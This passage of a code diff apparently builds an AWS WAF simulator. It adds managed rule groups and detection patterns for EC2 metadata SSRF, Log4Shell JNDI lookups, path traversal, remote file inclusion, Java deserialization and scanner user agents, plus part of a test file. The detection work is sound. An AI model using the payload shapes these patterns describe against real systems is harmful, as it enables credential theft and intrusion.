       regexPatternSets: this.#regexPatternSets,
+      managedRules: this.#managedRules,
     });
 
     this.#authorizer.authorizeResource(

--- a/src/service/wafv2/error/sim-wafv2.error.ts
+++ b/src/service/wafv2/error/sim-wafv2.error.ts
@@ -92,3 +92,16 @@ export class SimWafUnsimulatedInputException extends SimWafError {
     super(message, { httpStatusCode: 400 });
   }
 }
+
+/**
+ * A match declared against this simulation that it cannot answer with.
+ *
+ * The four `CrossSiteScripting_*` rules of the core rule set detect nothing
+ * here, so a test says which requests they claim. This is a simulator
+ * configuration error rather than an AWS one, and it is raised where the
+ * declaration is made rather than where a request meets the rule: a rule name
+ * no managed group carries would otherwise sit there matching nothing.
+ */
+export class SimWafDeclarationError extends SimWafError {
+  public override readonly name = "SimWafDeclarationError";
+}

--- a/src/service/wafv2/evaluate/sim-waf-decision.ts
+++ b/src/service/wafv2/evaluate/sim-waf-decision.ts
@@ -1,3 +1,4 @@
+import type { SimWafAction } from "../web-acl/sim-waf-action.js";
 import type { SimWafHeader } from "../web-acl/sim-waf-custom-response.type.js";
 import type { SimWafBlockedResponse } from "./sim-waf-blocked-response.js";
 
@@ -28,9 +29,52 @@ export interface SimWafDecision {
   /** The rules that matched in count mode, in the order they were evaluated. */
   readonly countedRuleNames: readonly string[];
 
+  /**
+   * The labels the rules that matched added to the request, in the order they
+   * were added.
+   *
+   * A managed rule group adds one for every rule of its own that matched, so
+   * this is what says which rule inside a group claimed the request. The rule
+   * that decided is the web ACL's own rule, and the group it names holds
+   * dozens.
+   */
+  readonly labels: readonly string[];
+
   /** The headers to add to the request before it is forwarded. */
   readonly insertedHeaders: readonly SimWafHeader[];
 
   /** What to answer with, when the decision was to block. */
   readonly blocked: SimWafBlockedResponse | undefined;
+}
+
+/**
+ * What a web ACL knows when it has finished evaluating a request.
+ */
+export interface SimWafDecisionProperties {
+  readonly action: SimWafAction;
+  readonly webAclName: string;
+  readonly webAclArn: string;
+  readonly terminatingRuleName: string | undefined;
+  readonly countedRuleNames: readonly string[];
+  readonly insertedHeaders: readonly SimWafHeader[];
+  readonly labels: readonly string[];
+}
+
+/**
+ * Turn what a web ACL worked out into the decision it answers with.
+ */
+export function simWafDecision(
+  properties: SimWafDecisionProperties,
+): SimWafDecision {
+  const { action } = properties;
+  const blocking = action.kind === "BLOCK";
+
+  return {
+    ...properties,
+    action: blocking ? "BLOCK" : "ALLOW",
+    // Nothing is forwarded when the request is blocked, so there is nothing
+    // for a rule's inserted headers to be added to.
+    insertedHeaders: blocking ? [] : properties.insertedHeaders,
+    blocked: action.blocked,
+  };
 }

--- a/src/service/wafv2/evaluate/sim-waf-evaluate-rules.ts
+++ b/src/service/wafv2/evaluate/sim-waf-evaluate-rules.ts
@@ -1,0 +1,62 @@
+import type { SimWafAction } from "../web-acl/sim-waf-action.js";
+import type { SimWafHeader } from "../web-acl/sim-waf-custom-response.type.js";
+import type { SimWafRule } from "../web-acl/sim-waf-rule.js";
+import type { SimWafInspectedRequest } from "./sim-waf-inspected-request.js";
+
+/**
+ * What a web ACL's rules did with one request.
+ *
+ * The action is the one that decided the request, and nothing when no rule
+ * terminated: the web ACL's default action decides then, and that belongs to
+ * the web ACL rather than to its rules.
+ */
+export interface SimWafRuleOutcome {
+  readonly action: SimWafAction | undefined;
+  readonly terminatingRuleName: string | undefined;
+  readonly countedRuleNames: readonly string[];
+  readonly insertedHeaders: readonly SimWafHeader[];
+}
+
+/**
+ * Run a web ACL's rules over one request.
+ *
+ * The rules are already in ascending priority, and the first of them that
+ * matches with a terminating action decides the request. A `Count` action
+ * records the match and lets the next rule have a look, which is why this
+ * carries on past a match rather than answering with the first one.
+ */
+export function simWafEvaluateRules(
+  rules: readonly SimWafRule[],
+  request: SimWafInspectedRequest,
+): SimWafRuleOutcome {
+  const countedRuleNames: string[] = [];
+  const insertedHeaders: SimWafHeader[] = [];
+
+  for (const rule of rules) {
+    const action = rule.evaluate(request);
+
+    if (action === undefined) {
+      continue;
+    }
+
+    insertedHeaders.push(...action.insertHeaders);
+
+    if (action.isTerminating) {
+      return {
+        action,
+        terminatingRuleName: rule.name,
+        countedRuleNames,
+        insertedHeaders,
+      };
+    }
+
+    countedRuleNames.push(rule.name);
+  }
+
+  return {
+    action: undefined,
+    terminatingRuleName: undefined,
+    countedRuleNames,
+    insertedHeaders,
+  };
+}

--- a/src/service/wafv2/evaluate/sim-waf-evaluation-request.ts
+++ b/src/service/wafv2/evaluate/sim-waf-evaluation-request.ts
@@ -1,0 +1,15 @@
+/**
+ * What a web ACL is asked to decide about.
+ */
+export interface SimWafEvaluationRequest {
+  /** The web ACL to evaluate against, by ARN. */
+  readonly webAclArn: string;
+
+  readonly request: Request;
+
+  /**
+   * The request body, when the rules might inspect it. A request body is a
+   * stream that cannot be read twice, so it is passed in already buffered.
+   */
+  readonly body?: Uint8Array | undefined;
+}

--- a/src/service/wafv2/evaluate/sim-waf-inspected-request.ts
+++ b/src/service/wafv2/evaluate/sim-waf-inspected-request.ts
@@ -1,3 +1,6 @@
+import { simAwsRequestHostname } from "../../../serve/http/url/sim-aws-request-hostname.js";
+import { SimWafRequestLabels } from "./sim-waf-request-labels.js";
+
 /**
  * The parts of an HTTP request a web ACL's rules are matched against.
  *
@@ -18,8 +21,17 @@ export interface SimWafInspectedRequest {
 
   readonly headers: Headers;
 
+  /**
+   * The AWS-facing hostname the request was addressed to, which is the Host
+   * header with the Yulin-local suffix taken off it.
+   */
+  readonly host: string;
+
   /** The request body, or nothing when the request carried none. */
   readonly body: Uint8Array | undefined;
+
+  /** The labels the rules that have run so far added to this request. */
+  readonly labels: SimWafRequestLabels;
 }
 
 /**
@@ -28,6 +40,11 @@ export interface SimWafInspectedRequest {
  * The body is passed in rather than read here because a request body is a
  * stream that cannot be consumed twice, and everything that serves a request in
  * this simulator has already buffered it by the time WAF gets a look.
+ *
+ * The hostname is the one the request would have used against real AWS. A
+ * simulated endpoint is served under `*.sim-aws.localhost`, and a rule reading
+ * the raw Host header would see that suffix on every request that reached
+ * anything at all.
  */
 export function simWafInspectedRequest(
   request: Request,
@@ -43,6 +60,8 @@ export function simWafInspectedRequest(
     uriPath: url.pathname,
     queryString: url.search.replace(/^\?/u, ""),
     headers: request.headers,
+    host: simAwsRequestHostname(request),
     body,
+    labels: new SimWafRequestLabels(),
   };
 }

--- a/src/service/wafv2/evaluate/sim-waf-request-labels.ts
+++ b/src/service/wafv2/evaluate/sim-waf-request-labels.ts
@@ -1,0 +1,47 @@
+/**
+ * The labels one request has picked up as a web ACL evaluates it.
+ *
+ * A rule adds its labels when it matches, and the rules that run after it can
+ * match on them, so the labels belong to the request being evaluated rather
+ * than to the web ACL. That is what makes the tuning pattern work: a managed
+ * rule group runs in count mode and labels the request, and a rule of the
+ * reader's own blocks on the label.
+ */
+export class SimWafRequestLabels {
+  readonly #added = new Set<string>();
+
+  /**
+   * Add a label, by its fully qualified name.
+   */
+  add(label: string): void {
+    this.#added.add(label);
+  }
+
+  /**
+   * Whether this exact label was added.
+   */
+  has(label: string): boolean {
+    return this.#added.has(label);
+  }
+
+  /**
+   * Whether any label within a namespace was added.
+   *
+   * A namespace is the label name up to and including a colon, so a key
+   * written without the trailing colon is read as if it had one. Without that,
+   * `awswaf:managed:aws:core-rule-set` would also match a label from a group
+   * whose name merely started with `core-rule-set`.
+   */
+  hasNamespace(namespace: string): boolean {
+    const prefix = namespace.endsWith(":") ? namespace : `${namespace}:`;
+
+    return this.#added.values().some((label) => label.startsWith(prefix));
+  }
+
+  /**
+   * Every label added, in the order the rules that added them ran.
+   */
+  all(): readonly string[] {
+    return [...this.#added];
+  }
+}

--- a/src/service/wafv2/index.ts
+++ b/src/service/wafv2/index.ts
@@ -31,6 +31,18 @@ export {
 } from "./ip-set/sim-waf-ip-set.js";
 export { SimWafRegexPatternSet } from "./regex-pattern-set/sim-waf-regex-pattern-set.js";
 export type { SimWafDecision } from "./evaluate/sim-waf-decision.js";
+export { SimWafRequestLabels } from "./evaluate/sim-waf-request-labels.js";
+export {
+  SimWafManagedRules,
+  type SimWafManagedMatchDeclaration,
+} from "./managed/sim-waf-managed-rules.js";
+export type { SimWafManagedRuleReport } from "./managed/sim-waf-managed-rule-report.js";
+export type { SimWafManagedRuleTier } from "./managed/sim-waf-managed-rule.type.js";
+export type {
+  SimWafManagedRuleGroupStatementInput,
+  SimWafOverrideActionInput,
+  SimWafRuleActionOverrideInput,
+} from "./managed/sim-waf-managed-group.type.js";
 export {
   simWafBlockedHttpResponse,
   type SimWafBlockedResponse,
@@ -43,6 +55,7 @@ export {
 export { simWafInspectionLimitBytes } from "./statement/sim-waf-field-content.js";
 export type { SimWafStatementInput } from "./statement/sim-waf-statement.type.js";
 export {
+  SimWafDeclarationError,
   SimWafDuplicateItemException,
   SimWafError,
   type SimWafErrorMetadata,

--- a/src/service/wafv2/managed/detect/sim-waf-managed-components.ts
+++ b/src/service/wafv2/managed/detect/sim-waf-managed-components.ts
@@ -1,0 +1,70 @@
+import type { SimWafManagedDetector } from "../sim-waf-managed-rule.type.js";
+
+/**
+ * Whether one string carries what a managed rule is looking for.
+ */
+export type SimWafManagedPattern = (value: string) => boolean;
+
+/**
+ * Read a rule's pattern against the URI path.
+ *
+ * These six point one pattern at the component a rule reads.
+ *
+ * The managed rules come in families that run the same detection over a
+ * different component each, which is what the `_BODY` and `_URIPATH` on the
+ * end of a rule name says. Pairing a pattern with a component here is what
+ * lets each rule be one line of the group it belongs to.
+ *
+ * A component that holds several strings matches when any of them does, as a
+ * rule reading a set of query arguments or headers does on AWS.
+ */
+export function simWafInUriPath(
+  pattern: SimWafManagedPattern,
+): SimWafManagedDetector {
+  return (parts): boolean => pattern(parts.uriPath);
+}
+
+/**
+ * Read a rule's pattern against the query string.
+ */
+export function simWafInQueryString(
+  pattern: SimWafManagedPattern,
+): SimWafManagedDetector {
+  return (parts): boolean => pattern(parts.queryString);
+}
+
+/**
+ * Read a rule's pattern against every query argument.
+ */
+export function simWafInQueryArguments(
+  pattern: SimWafManagedPattern,
+): SimWafManagedDetector {
+  return (parts): boolean => parts.queryArguments.some(pattern);
+}
+
+/**
+ * Read a rule's pattern against as much of the body as WAF inspects.
+ */
+export function simWafInBody(
+  pattern: SimWafManagedPattern,
+): SimWafManagedDetector {
+  return (parts): boolean => pattern(parts.body);
+}
+
+/**
+ * Read a rule's pattern against the whole cookie header.
+ */
+export function simWafInCookies(
+  pattern: SimWafManagedPattern,
+): SimWafManagedDetector {
+  return (parts): boolean => pattern(parts.cookieHeader);
+}
+
+/**
+ * Read a rule's pattern against every header the request sent.
+ */
+export function simWafInHeaders(
+  pattern: SimWafManagedPattern,
+): SimWafManagedDetector {
+  return (parts): boolean => parts.headerValues.some(pattern);
+}

--- a/src/service/wafv2/managed/detect/sim-waf-managed-patterns.ts
+++ b/src/service/wafv2/managed/detect/sim-waf-managed-patterns.ts
@@ -1,0 +1,139 @@
+import { simWafUrlDecode } from "../../statement/sim-waf-url-decode.js";
+
+/**
+ * The patterns AWS published for its managed rules, and nothing beyond them.
+ *
+ * AWS documents an example pattern or two for each of these rules and holds
+ * the rest back, which is what stops a simulation of them from agreeing with
+ * real WAF. Each function here matches what was published, so every one of
+ * them detects less than the rule it stands for and none of them detects more.
+ *
+ * That direction is the whole point. A test with the core rule set on is
+ * usually asking whether an application's own traffic still gets through, and
+ * a rule that blocked more than AWS blocks would fail that test for a request
+ * AWS allows. A rule that blocks less is invisible to it, and right on AWS
+ * too.
+ *
+ * Every one of these reads the component after a URL decode, because the
+ * managed rules apply one and a payload arrives percent encoded more often
+ * than not.
+ */
+
+/** The EC2 instance metadata address and the path exfiltration asks it for. */
+const metadataAddress = "169.254.169.254";
+const metadataPath = "/latest/meta-data";
+
+/** `${jndi:` is the published shape of a Log4Shell lookup. */
+const jndiLookup = /\$\{jndi:/iu;
+
+/** A path traversal, in either slash, either way round. */
+const pathTraversal = /\.\.[/\\]|[/\\]\.\./u;
+
+/**
+ * A URL scheme followed by an IPv4 host, which is the published RFI shape.
+ *
+ * Every quantifier here is bounded and each is followed by a character it
+ * cannot itself match, so a value that fails to match fails at a fixed
+ * position. The unsafe-expression check reads the repeated groups and cannot
+ * see that.
+ */
+const remoteInclusion =
+  // oxlint-disable-next-line security/detect-unsafe-regex
+  /[a-z][a-z\d+.-]{0,30}:\/\/\d{1,3}(?:\.\d{1,3}){3}/iu;
+
+/** The two file extensions AWS gives as examples of a restricted one. */
+const restrictedExtension = /\.(?:log|ini)\b/iu;
+
+/**
+ * Whether a component asks the EC2 instance metadata service for anything.
+ *
+ * Both halves are patterns in the request rather than facts about its sender,
+ * so neither of them needs the caller's address that keeps
+ * `IPSetReferenceStatement` out of this simulation.
+ */
+export function simWafDetectsEc2MetadataSsrf(value: string): boolean {
+  const decoded = simWafUrlDecode(value);
+
+  return (
+    decoded.includes(metadataAddress) ||
+    decoded.toLowerCase().includes(metadataPath)
+  );
+}
+
+/**
+ * Whether a component carries a JNDI lookup, which is how Log4Shell arrives.
+ *
+ * The nested forms that hide the letters of `jndi` behind further lookups are
+ * not matched. AWS matches them and does not say how.
+ */
+export function simWafDetectsLog4JRce(value: string): boolean {
+  return jndiLookup.test(simWafUrlDecode(value));
+}
+
+/**
+ * Whether a component carries a local file inclusion, which is a traversal out
+ * of the directory a path was meant to stay in.
+ */
+export function simWafDetectsGenericLfi(value: string): boolean {
+  return pathTraversal.test(simWafUrlDecode(value));
+}
+
+/**
+ * Whether a component carries a remote file inclusion, which AWS describes as
+ * a URL scheme followed by an IPv4 host.
+ */
+export function simWafDetectsGenericRfi(value: string): boolean {
+  return remoteInclusion.test(simWafUrlDecode(value));
+}
+
+/**
+ * Whether a component names a file with a restricted extension.
+ *
+ * The extension has to end there, so `report.log` is a match and `logo.png` is
+ * not.
+ */
+export function simWafDetectsRestrictedExtension(value: string): boolean {
+  return restrictedExtension.test(simWafUrlDecode(value));
+}
+
+/**
+ * Whether a path asks for a web application directory that is not meant to be
+ * served, which AWS gives `web-inf` as the example of.
+ */
+export function simWafDetectsExploitablePath(value: string): boolean {
+  return simWafUrlDecode(value).toLowerCase().includes("web-inf");
+}
+
+/**
+ * Whether a path asks for an exposed administrative page, which AWS gives
+ * `sqlmanager` as the example of.
+ *
+ * The administrative paths an application of its own uses are not matched.
+ * `/admin` is nowhere in what AWS published, and matching it here would block
+ * a request AWS lets through.
+ */
+export function simWafDetectsAdminPath(value: string): boolean {
+  return simWafUrlDecode(value).toLowerCase().includes("sqlmanager");
+}
+
+/**
+ * Whether a component carries a serialized Java object, which is the payload
+ * an unsafe deserialization is delivered in.
+ *
+ * `rO0` is the base64 of the two bytes a Java stream starts with, and it is
+ * the published example. The raw bytes are not matched: they are not valid
+ * UTF-8, and every component here is read as text.
+ */
+export function simWafDetectsJavaDeserializationRce(value: string): boolean {
+  return simWafUrlDecode(value).includes("rO0");
+}
+
+/**
+ * Whether a User-Agent names one of the scanners AWS gives as examples of a
+ * bad bot.
+ */
+export function simWafDetectsBadBot(value: string): boolean {
+  const decoded = simWafUrlDecode(value).toLowerCase();
+
+  return decoded.includes("nessus") || decoded.includes("nmap");
+}

--- a/src/service/wafv2/managed/detect/sim-waf-managed-sizes.ts
+++ b/src/service/wafv2/managed/detect/sim-waf-managed-sizes.ts
@@ -1,0 +1,14 @@
+/**
+ * The sizes the four `SizeRestrictions_*` rules allow a component to reach.
+ *
+ * AWS documents every one of these figures, so these rules match exactly where
+ * the rules they stand for match. A component of exactly the limit is allowed
+ * and one byte more is not, which is the boundary a test about a large upload
+ * or a long query string is really asking about.
+ */
+export const simWafManagedSizeLimits = {
+  queryString: 2048,
+  cookieHeader: 10_240,
+  body: 8192,
+  uriPath: 1024,
+} as const;

--- a/src/service/wafv2/managed/group/sim-waf-admin-protection.ts
+++ b/src/service/wafv2/managed/group/sim-waf-admin-protection.ts
@@ -1,0 +1,24 @@
+import { simWafInUriPath } from "../detect/sim-waf-managed-components.js";
+import { simWafDetectsAdminPath } from "../detect/sim-waf-managed-patterns.js";
+import type { SimWafManagedRuleGroupDefinition } from "../sim-waf-managed-rule.type.js";
+
+/**
+ * The AWS admin protection rule set, which is one rule that blocks by default.
+ *
+ * It keeps external callers off the administrative pages third-party software
+ * exposes. What it matches is a published example and no more, so an
+ * application's own administrative paths reach it here as they do on AWS.
+ */
+export const simWafAdminProtectionRuleSet: SimWafManagedRuleGroupDefinition = {
+  name: "AWSManagedRulesAdminProtectionRuleSet",
+  labelNamespace: "awswaf:managed:aws:admin-protection",
+  capacity: 100,
+  rules: [
+    {
+      name: "AdminProtection_URIPATH",
+      label: "AdminProtection_URIPath",
+      tier: "documented",
+      detects: simWafInUriPath(simWafDetectsAdminPath),
+    },
+  ],
+};

--- a/src/service/wafv2/managed/group/sim-waf-common-rule-set.ts
+++ b/src/service/wafv2/managed/group/sim-waf-common-rule-set.ts
@@ -1,0 +1,23 @@
+import type { SimWafManagedRuleGroupDefinition } from "../sim-waf-managed-rule.type.js";
+import { simWafCorePayloadRules } from "./sim-waf-core-payload-rules.js";
+import { simWafCoreRequestRules } from "./sim-waf-core-request-rules.js";
+
+/**
+ * The AWS core rule set, in the order AWS evaluates its rules.
+ *
+ * This is the group a team turning WAF on nearly always turns on, which is why
+ * it is here. Every rule blocks by default.
+ *
+ * The order matters as much as the rules do. Two rules can claim one request,
+ * and the first of them to claim it is the one that blocks it and the one
+ * whose label the request carries, so a rule moved up or down would change
+ * which of them a test sees. The rules are held in two lists, and the join
+ * between them is where AWS's own order goes from reading the request to
+ * looking inside it.
+ */
+export const simWafCommonRuleSet: SimWafManagedRuleGroupDefinition = {
+  name: "AWSManagedRulesCommonRuleSet",
+  labelNamespace: "awswaf:managed:aws:core-rule-set",
+  capacity: 700,
+  rules: [...simWafCoreRequestRules, ...simWafCorePayloadRules],
+};

--- a/src/service/wafv2/managed/group/sim-waf-core-payload-rules.ts
+++ b/src/service/wafv2/managed/group/sim-waf-core-payload-rules.ts
@@ -1,0 +1,116 @@
+import {
+  simWafInBody,
+  simWafInCookies,
+  simWafInQueryArguments,
+  simWafInUriPath,
+} from "../detect/sim-waf-managed-components.js";
+import {
+  simWafDetectsEc2MetadataSsrf,
+  simWafDetectsGenericLfi,
+  simWafDetectsGenericRfi,
+  simWafDetectsRestrictedExtension,
+} from "../detect/sim-waf-managed-patterns.js";
+import type { SimWafManagedRuleDefinition } from "../sim-waf-managed-rule.type.js";
+
+/**
+ * The core rule set rules that look inside a request, in AWS's order.
+ *
+ * These are the last sixteen rules of the group. Each of them reads one
+ * component for one payload, which is what the end of a rule name says, and
+ * the four `CrossSiteScripting_*` rules that close the group detect nothing:
+ * AWS documents none of the detection they run.
+ */
+export const simWafCorePayloadRules: readonly SimWafManagedRuleDefinition[] = [
+  {
+    name: "EC2MetaDataSSRF_BODY",
+    label: "EC2MetaDataSSRF_Body",
+    tier: "documented",
+    detects: simWafInBody(simWafDetectsEc2MetadataSsrf),
+  },
+  {
+    name: "EC2MetaDataSSRF_COOKIE",
+    label: "EC2MetaDataSSRF_Cookie",
+    tier: "documented",
+    detects: simWafInCookies(simWafDetectsEc2MetadataSsrf),
+  },
+  {
+    name: "EC2MetaDataSSRF_URIPATH",
+    label: "EC2MetaDataSSRF_URIPath",
+    tier: "documented",
+    detects: simWafInUriPath(simWafDetectsEc2MetadataSsrf),
+  },
+  {
+    name: "EC2MetaDataSSRF_QUERYARGUMENTS",
+    label: "EC2MetaDataSSRF_QueryArguments",
+    tier: "documented",
+    detects: simWafInQueryArguments(simWafDetectsEc2MetadataSsrf),
+  },
+  {
+    name: "GenericLFI_QUERYARGUMENTS",
+    label: "GenericLFI_QueryArguments",
+    tier: "documented",
+    detects: simWafInQueryArguments(simWafDetectsGenericLfi),
+  },
+  {
+    name: "RestrictedExtensions_URIPATH",
+    label: "RestrictedExtensions_URIPath",
+    tier: "documented",
+    detects: simWafInUriPath(simWafDetectsRestrictedExtension),
+  },
+  {
+    name: "RestrictedExtensions_QUERYARGUMENTS",
+    label: "RestrictedExtensions_QueryArguments",
+    tier: "documented",
+    detects: simWafInQueryArguments(simWafDetectsRestrictedExtension),
+  },
+  {
+    name: "GenericLFI_URIPATH",
+    label: "GenericLFI_URIPath",
+    tier: "documented",
+    detects: simWafInUriPath(simWafDetectsGenericLfi),
+  },
+  {
+    name: "GenericLFI_BODY",
+    label: "GenericLFI_Body",
+    tier: "documented",
+    detects: simWafInBody(simWafDetectsGenericLfi),
+  },
+  {
+    name: "GenericRFI_QUERYARGUMENTS",
+    label: "GenericRFI_QueryArguments",
+    tier: "documented",
+    detects: simWafInQueryArguments(simWafDetectsGenericRfi),
+  },
+  {
+    name: "GenericRFI_BODY",
+    label: "GenericRFI_Body",
+    tier: "documented",
+    detects: simWafInBody(simWafDetectsGenericRfi),
+  },
+  {
+    name: "GenericRFI_URIPATH",
+    label: "GenericRFI_URIPath",
+    tier: "documented",
+    detects: simWafInUriPath(simWafDetectsGenericRfi),
+  },
+  {
+    name: "CrossSiteScripting_COOKIE",
+    label: "CrossSiteScripting_Cookie",
+    tier: "declared",
+  },
+  {
+    name: "CrossSiteScripting_QUERYARGUMENTS",
+    label: "CrossSiteScripting_QueryArguments",
+    tier: "declared",
+  },
+  {
+    name: "CrossSiteScripting_BODY",
+    label: "CrossSiteScripting_Body",
+    tier: "declared",
+  },
+  {
+    name: "CrossSiteScripting_URIPATH",
+    label: "CrossSiteScripting_URIPath",
+    tier: "declared",
+  },
+];

--- a/src/service/wafv2/managed/group/sim-waf-core-request-rules.ts
+++ b/src/service/wafv2/managed/group/sim-waf-core-request-rules.ts
@@ -1,0 +1,55 @@
+import { simWafDetectsBadBot } from "../detect/sim-waf-managed-patterns.js";
+import { simWafManagedSizeLimits } from "../detect/sim-waf-managed-sizes.js";
+import type { SimWafManagedRuleDefinition } from "../sim-waf-managed-rule.type.js";
+
+/**
+ * The core rule set rules that read the request itself, in AWS's order.
+ *
+ * These are the first six rules of the group, and the four size restrictions
+ * among them are the ones AWS documents a figure for. They are the rules most
+ * likely to claim an application's own traffic, and the ones a team therefore
+ * meets first.
+ */
+export const simWafCoreRequestRules: readonly SimWafManagedRuleDefinition[] = [
+  {
+    name: "NoUserAgent_HEADER",
+    label: "NoUserAgent_Header",
+    tier: "exact",
+    detects: (parts): boolean =>
+      parts.userAgent === undefined || parts.userAgent === "",
+  },
+  {
+    name: "UserAgent_BadBots_HEADER",
+    label: "UserAgent_BadBots_Header",
+    tier: "documented",
+    detects: (parts): boolean =>
+      parts.userAgent !== undefined && simWafDetectsBadBot(parts.userAgent),
+  },
+  {
+    name: "SizeRestrictions_QUERYSTRING",
+    label: "SizeRestrictions_QueryString",
+    tier: "exact",
+    detects: (parts): boolean =>
+      parts.queryStringBytes > simWafManagedSizeLimits.queryString,
+  },
+  {
+    name: "SizeRestrictions_Cookie_HEADER",
+    label: "SizeRestrictions_Cookie_Header",
+    tier: "exact",
+    detects: (parts): boolean =>
+      parts.cookieHeaderBytes > simWafManagedSizeLimits.cookieHeader,
+  },
+  {
+    name: "SizeRestrictions_BODY",
+    label: "SizeRestrictions_Body",
+    tier: "exact",
+    detects: (parts): boolean => parts.bodyBytes > simWafManagedSizeLimits.body,
+  },
+  {
+    name: "SizeRestrictions_URIPATH",
+    label: "SizeRestrictions_URIPath",
+    tier: "exact",
+    detects: (parts): boolean =>
+      parts.uriPathBytes > simWafManagedSizeLimits.uriPath,
+  },
+];

--- a/src/service/wafv2/managed/group/sim-waf-known-bad-inputs.ts
+++ b/src/service/wafv2/managed/group/sim-waf-known-bad-inputs.ts
@@ -1,0 +1,98 @@
+import {
+  simWafInBody,
+  simWafInHeaders,
+  simWafInQueryString,
+  simWafInUriPath,
+} from "../detect/sim-waf-managed-components.js";
+import {
+  simWafDetectsExploitablePath,
+  simWafDetectsJavaDeserializationRce,
+  simWafDetectsLog4JRce,
+} from "../detect/sim-waf-managed-patterns.js";
+import type { SimWafManagedRuleGroupDefinition } from "../sim-waf-managed-rule.type.js";
+
+/**
+ * The AWS known bad inputs rule set, in the order AWS evaluates its rules.
+ *
+ * This is the group that goes on beside the core rule set. Every rule blocks
+ * by default.
+ *
+ * `Host_localhost_HEADER` reads the AWS-facing hostname rather than the Host
+ * header as it arrived. A simulated endpoint is served under
+ * `*.sim-aws.localhost`, so a rule reading the header itself would block every
+ * request to every simulated endpoint and nothing else would ever be tested.
+ */
+export const simWafKnownBadInputsRuleSet: SimWafManagedRuleGroupDefinition = {
+  name: "AWSManagedRulesKnownBadInputsRuleSet",
+  labelNamespace: "awswaf:managed:aws:known-bad-inputs",
+  capacity: 200,
+  rules: [
+    {
+      name: "JavaDeserializationRCE_HEADER",
+      label: "JavaDeserializationRCE_Header",
+      tier: "documented",
+      detects: simWafInHeaders(simWafDetectsJavaDeserializationRce),
+    },
+    {
+      name: "JavaDeserializationRCE_BODY",
+      label: "JavaDeserializationRCE_Body",
+      tier: "documented",
+      detects: simWafInBody(simWafDetectsJavaDeserializationRce),
+    },
+    {
+      name: "JavaDeserializationRCE_URIPATH",
+      label: "JavaDeserializationRCE_URIPath",
+      tier: "documented",
+      detects: simWafInUriPath(simWafDetectsJavaDeserializationRce),
+    },
+    {
+      name: "JavaDeserializationRCE_QUERYSTRING",
+      label: "JavaDeserializationRCE_QueryString",
+      tier: "documented",
+      detects: simWafInQueryString(simWafDetectsJavaDeserializationRce),
+    },
+    {
+      name: "Host_localhost_HEADER",
+      label: "Host_Localhost_Header",
+      tier: "exact",
+      detects: (parts): boolean =>
+        parts.host.toLowerCase().includes("localhost"),
+    },
+    {
+      name: "PROPFIND_METHOD",
+      label: "Propfind_Method",
+      tier: "exact",
+      detects: (parts): boolean => parts.method === "PROPFIND",
+    },
+    {
+      name: "ExploitablePaths_URIPATH",
+      label: "ExploitablePaths_URIPath",
+      tier: "documented",
+      detects: simWafInUriPath(simWafDetectsExploitablePath),
+    },
+    {
+      name: "Log4JRCE_HEADER",
+      label: "Log4JRCE_Header",
+      tier: "documented",
+      detects: simWafInHeaders(simWafDetectsLog4JRce),
+    },
+    {
+      name: "Log4JRCE_QUERYSTRING",
+      label: "Log4JRCE_QueryString",
+      tier: "documented",
+      detects: simWafInQueryString(simWafDetectsLog4JRce),
+    },
+    {
+      name: "Log4JRCE_BODY",
+      label: "Log4JRCE_Body",
+      tier: "documented",
+      detects: simWafInBody(simWafDetectsLog4JRce),
+    },
+    {
+      name: "Log4JRCE_URIPATH",
+      label: "Log4JRCE_URIPath",
+      tier: "documented",
+      detects: simWafInUriPath(simWafDetectsLog4JRce),
+    },
+  ],
+};

--- a/src/service/wafv2/managed/sim-waf-managed-detection.iso.test.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-detection.iso.test.ts
@@ -1,0 +1,324 @@
+import {
+  assertArrayEquals,
+  assertArrayIncludes,
+  assertArrayLength,
+} from "@kensio/smartass";
+import { describe, it } from "vitest";
+
+import { SimAws } from "../../aws/sim-aws.js";
+import {
+  simWafBrowserRequest,
+  simWafWebAclDecisions,
+} from "../sim-wafv2.fixture.js";
+import { simWafManagedRuleFactory } from "../web-acl/sim-waf-rule.factory.js";
+
+const encoder = new TextEncoder();
+
+/**
+ * Run one managed rule group over requests and answer with the rules that
+ * claimed each of them.
+ *
+ * The group counts rather than blocks, so every rule in it gets to run and the
+ * labels name each rule that matched. A test about detection is asking which
+ * rules claim a request, and the labels are the only place that is said.
+ */
+async function labelsFrom(
+  group: string,
+): Promise<(request: Request, body?: Uint8Array) => readonly string[]> {
+  const decide = await simWafWebAclDecisions(new SimAws().wafV2(), [
+    {
+      ...simWafManagedRuleFactory.make(),
+      OverrideAction: { Count: {} },
+      Statement: {
+        ManagedRuleGroupStatement: { VendorName: "AWS", Name: group },
+      },
+    },
+  ]);
+
+  return (request, body): readonly string[] =>
+    decide(request, body).labels.map((label) => label.split(":").pop() ?? "");
+}
+
+const coreRuleSet = (): Promise<
+  (request: Request, body?: Uint8Array) => readonly string[]
+> => labelsFrom("AWSManagedRulesCommonRuleSet");
+
+const knownBadInputs = (): Promise<
+  (request: Request, body?: Uint8Array) => readonly string[]
+> => labelsFrom("AWSManagedRulesKnownBadInputsRuleSet");
+
+/**
+ * A query string of exactly this many bytes.
+ */
+function queryStringOf(bytes: number): string {
+  return `?q=${"a".repeat(bytes - 2)}`;
+}
+
+describe("AWS managed rule detection", () => {
+  it("lets ordinary traffic through every rule", async () => {
+    // Given the core rule set and the known bad inputs group.
+    const core = await coreRuleSet();
+    const known = await knownBadInputs();
+
+    // When a request an application of its own would make is evaluated.
+    const request = simWafBrowserRequest(
+      "https://example.test/orders?page=2&sort=created_at",
+      { method: "POST" },
+    );
+    const body = encoder.encode('{"customer":"c-1234","total":19.99}');
+
+    // Then no rule in either group claimed it. That is the test these groups
+    // are usually in a test suite for.
+    assertArrayLength(core(request, body), 0);
+    assertArrayLength(known(request, body), 0);
+  });
+
+  it("restricts a query string to 2,048 bytes", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+
+    // When a query string of exactly the limit is evaluated, and one a byte
+    // over it.
+    const atLimit = core(
+      simWafBrowserRequest(`https://example.test/search${queryStringOf(2048)}`),
+    );
+    const overLimit = core(
+      simWafBrowserRequest(`https://example.test/search${queryStringOf(2049)}`),
+    );
+
+    // Then the limit itself is allowed and a byte more is not. AWS documents
+    // the figure, so this rule matches where the AWS rule matches.
+    assertArrayLength(atLimit, 0);
+    assertArrayEquals(overLimit, ["SizeRestrictions_QueryString"]);
+  });
+
+  it("restricts a cookie header to 10,240 bytes", async () => {
+    // Given the core rule set.
+    const core = await coreRuleSet();
+    const cookie = (bytes: number): Request =>
+      simWafBrowserRequest("https://example.test/", {
+        headers: { cookie: `session=${"a".repeat(bytes - 8)}` },
